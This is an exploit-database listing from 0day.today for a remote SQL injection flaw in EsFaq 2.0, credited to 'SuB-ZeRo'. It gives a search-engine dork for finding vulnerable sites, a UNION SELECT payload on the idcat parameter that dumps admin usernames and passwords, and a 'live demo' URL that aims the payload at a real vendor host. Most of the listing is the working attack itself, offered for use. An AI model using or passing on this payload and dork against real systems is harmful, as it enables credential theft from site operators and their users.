[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

EsFaq 2.0 (idcat) Remote SQL Injection Vulnerability

Author
SuB-ZeRo
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3612
Category
web applications
Date add
04-09-2008
Platform
unsorted
====================================================
EsFaq 2.0 (idcat) Remote SQL Injection Vulnerability
====================================================


|___________________________________________________|
|
| EsFaq Remote Sql Injection Exploit
|
|___________________________________________________
|---------------------SuB-ZeRo----------------------|
|
|    Author: SuB-ZeRo
|
|
|___________________________________________________
|                                                   |
|
| script :http://editeurscripts.com/ressources/scripts-php/dl.php?idscript=5
|
| DorK   : inurl:questions.php?idcat
|___________________________________________________|
Exploit:
________
 
www.[target].com/Script/questions.php?idcat=10 UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7,8,9 FROM admin_users--
 
 

L!VE DEMO:
_________
http://demo.editeurscripts.com/EsFaq/questions.php?idcat=10 UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7,8,9 FROM admin_users--

____________



#  0day.today [2024-06-16]  #